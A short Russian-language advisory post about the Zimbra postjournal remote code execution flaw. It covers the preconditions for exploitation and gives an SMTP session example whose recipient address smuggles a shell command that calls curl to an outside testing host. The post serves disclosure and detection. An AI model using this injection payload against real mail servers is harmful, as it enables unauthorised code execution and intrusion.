Вышла новая CVE-2024-45519 на Zimbra Collaboration Suite < 9.0.0, а именно на сервис postjournal. Уязвимость позволяет выполнить удаленный код без аутентификации
В дополнение к другим постам хочу отметить, что по умолчанию Zimbra не будет уязвима, необходим включенный модуль postjournal.
Пример эксплуатации:
EHLO localhost
MAIL FROM: <aaaa@mail.domain.com>
RCPT TO: <"aabbb$(curl${IFS}oast.me)"@mail.domain.com>
DATA
Test message
.
Так же для эксплуатации необходим один из двух пунктов:
- находится в локальной либо разрешенной сети (список mynetworks), либо рассчитывать что она будет некорректно сконфигурирована
- пройти аутентификацию.
Публичные эксплойты (шаблон nuclei в том числе) проверяют возможность эксплуатации без аутха.
Детали в отличном разборе в блоге ProjectDiscovery.
Ссылки:
- Разбор: https://blog.projectdiscovery.io/zimbra-remote-code-execution/
- Шаблон: https://github.com/projectdiscovery/nuclei-templates/pull/10860